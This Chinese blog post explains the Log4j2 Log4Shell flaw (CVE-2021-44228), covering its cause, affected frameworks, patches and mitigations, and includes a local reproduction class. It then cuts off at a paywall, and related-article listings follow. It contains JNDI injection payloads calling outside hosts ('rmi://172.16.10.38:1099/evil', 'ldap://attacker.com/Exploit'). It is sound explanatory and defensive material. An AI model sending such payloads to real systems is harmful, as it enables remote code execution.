CVE-2021-44228 Log4j2 远程代码执行漏洞

最新推荐文章于 2025-05-26 21:51:08 发布
原创 最新推荐文章于 2025-05-26 21:51:08 发布 · 824 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

1. 什么是Log4j?

  1. Log4j是Apache的一个开源项目,主要是是用来记录日志信息的输出或者记录.

2. 为什么会造成这个漏洞?

  1. 原因很简单,log4j想干的是太多了,还想利用在本机上利用rmi运行别处的代码,并输出或记录日志.
  2. 具体来说,Log4j2提供的提供的lookup共能造成的,该功能允许开发者通过一些协议(JNDI或其他)去读取相应环境中的配置.但是并没有进行严格的判断,从而导致了该漏洞的发生

3. 在什么地方会发生这个漏洞?

  1. 一些主流的Java框架:

    1. Spring-Boot
    2. Apache Struts2
    3. Apache Solr
    4. flume

  2. 受到影响的游戏:

    1. 我的世界(MineCrafe)

4. Apache的解决方案是什么?

  1. 在爆出此漏洞后的Apache Log4j 2.15.0 RC1中,目前是指定了java,Idap和Iadps可以使用这个协议,限制了Idap仅限本地访问java的对象

  2. 此后,当RC1仍然爆出有远程代码漏洞后,Apache Log4j2 2.15.0 RC2直接将lookup远程获取源代码相关功能给关了(惹不起?还关不起吗?)

5. 开发者如何进行审查?

  1. 如果是用Maven部署的项目,那么请审查pom.xml文件,是否有log4j的core和api且为2.14.0以下版本,那么请尽快把下面的版本号转为2.15.0

就类似下图

  1. 如果开发者不是基于Maven部署,那么就要审查项目中是否导入log4j 2.x.x的jar包.

6. 如果为了项目的稳定性,无法升级Log4j,又该怎么解决呢?

  1. 前提是你不用lookup,那么可以修改jvm参数: -Dlog4j2.formatMsgNoLookups=true
  2. 也可以修改配置:log4j2.formatMsgNoLookups=True
  3. 修改系统变量:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true
  4. 注意Java版本

7. 简单的漏洞复刻:

文件结构

├─src
│  ├─main
│  │  ├─java
│  │  │  └─com
│  │  │      └─loudong
│  │  │          │  Log4j2Test.java

Log4j2Test.java源代码

import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;
public class Log4j2Test {
   
    private static final Logger LOGGER = LogManager.getLogger();

    public static void main (String... args){
   
       String username = "${java:os}";
		//String username = "${jndi:rmi://172.16.10.38:1099/evil}";
		// 上面在下面中会用到,用时直接打掉注释即可
        LOGGER.info("Hello,{}!。",username);
    }
}

前提是项目里有log4j,且版本号低于2.15.0

其中log4j2.xml文件配置如下

<?xml version="1.0" encoding="UTF-8"?>
<!--
    status : 这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,会看到log4j2内部各种详细输出
    monitorInterval : Log4j能够自动检测修改配置文件和重新配置本身, 设置间隔秒数。

    注:本配置文件的目标是将不同级别的日志输出到不同文件,最大2MB一个文件,
    文件数据达到最大值时,旧数据会被压缩并放进指定文件夹
-->
<Configuration status="WARN" monitorInterval="600">

    <Properties>
        <!-- 配置日志文件输出目录,此配置将日志输出到tomcat根目录下的指定文件夹 -->
        <Property name="LOG_HOME">Logs</Property>
    </Properties>

    <Appenders>

        <!--这个输出控制台的配置,这里输出除了warn和error级别的信息到System.out-->
        <Console name="console_out_appender" target="SYSTEM_OUT">
            <!-- 控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch) -->
            <ThresholdFilter level="warn" onMatch="DENY" onMismatch="ACCEPT"/>
            <!-- 输出日志的格式 -->
            <PatternLayout pattern="%5p [%t] %d{yyyy-MM-dd HH:mm:ss} (%F:%L) %m%n"/>
        </Console>
        <!--这个输出控制台的配置,这里输出warn和error级别的信息到System.err,在eclipse控制台上看到的是红色文字-->
        <Console name="console_err_appender" target="SYSTEM_ERR">
            <!-- 控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch) -->
            <ThresholdFilter level="warn" onMatch="ACCEPT"
最低0.47元/天 解锁文章
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
idea中使用log4j2打印日志
ygd1994的专栏
05-24 1万+
先去下载log4j的jar包,将log4j-api-2.8.2.jar和log4j-core-2.8.2.jar导入到lib目录自定义log4j2.xml文件到src目录下 配置文件如下: <?xml version="1.0" encoding="UTF-8"?> <!-- status : 这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,会看到log4j2
CVE-2021-44228源码分析与漏洞复现
最新发布
spinage的博客
05-26 1246
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)是影响2.0-beta9至2.14.1版本的高危漏洞(CVSS 10.0)。该漏洞源于Log4j2的消息查找功能未对用户输入进行安全过滤,允许攻击者通过构造包含恶意JNDI查询的日志消息(如${jndi:ldap://attacker.com/Exploit})触发远程代码执行漏洞触发流程包括:1)用户输入被记录到日志;2)MessagePatternConverter解析消息中的占位符;3)StrSubstitutor处理动态内
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 3574
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3507
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1227
CVE-2021-44228
Log4j2 远程代码执行漏洞CVE-2021-44228
qq_68163788的博客
06-18 1590
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1182
vulhub复现cve-2021-44228 log4j漏洞
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 4191
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1721
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
Log4j2远程命令执行(CVE-2021-44228
weixin_48817799的博客
01-25 1215
Log4j2远程命令执行(CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5397
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
log4j2 远程代码执行漏洞复现(CVE-2021-44228
m0_68045701的博客
07-18 1443
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2Apache Solr、Apache Druid、Apache Flink等均受影响。
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)
weixin_68177269的博客
09-27 634
log4j就会去解析该信息,通过jndi的lookup() 方法去解析该url:ldap:attacker:1099/exp。受害主机访问伪造的ldap服务,访问恶意java.class类,执行恶意代码。如果ldap没有解析成功会自动访问http。当用户输入信息时,应用程序中的log4j 2组件会将信息记录到日志中。条件:lookup()参数可控。假如日志中包含有语句。
Apache Log4j2远程代码执行漏洞CVE-2021-44228)复现
qq_40640917的博客
01-10 2648
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4678
Apache Log4j2Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值